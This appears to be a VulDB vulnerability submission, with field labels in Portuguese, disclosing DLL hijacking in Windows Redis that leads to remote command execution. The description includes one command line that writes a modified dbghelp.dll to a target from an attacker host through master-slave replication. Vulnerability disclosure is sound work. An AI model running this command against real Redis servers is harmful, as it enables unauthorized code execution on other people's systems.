| Título | Redis On Windows DLL Hijacking Result in RCE When Unauthorized |
|---|
| Descrição | There is a dll hijacking vulnerability in the Windows version of Redis.
When Redis has unauthorized access or password disclosure, attackers can use dll writing to implement system remote command execution using the Windows version of Redis.
Use RedisWriteFile to write the modified dbghelp.dll to the designated location of the target using master slave replication.
python3 RedisWriteFile.py --rhost=192.168.41.29 --rport=6379 --lhost=192.168.41.38 --rpath="C:/Program Files/Redis/" --rfile="dbghelp.dll" --lfile="dbghelp.dll"
details can be seen on https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| Fonte | ⚠️ https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| Utilizador | J0o1ey (UID 30618) |
|---|
| Submissão | 26/10/2022 12h05 (há 3 anos) |
|---|
| Moderação | 28/10/2022 07h39 (2 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 212416 [Redis em Windows dbghelp.dll Elevação de Privilégios] |
|---|
| Pontos | 20 |
|---|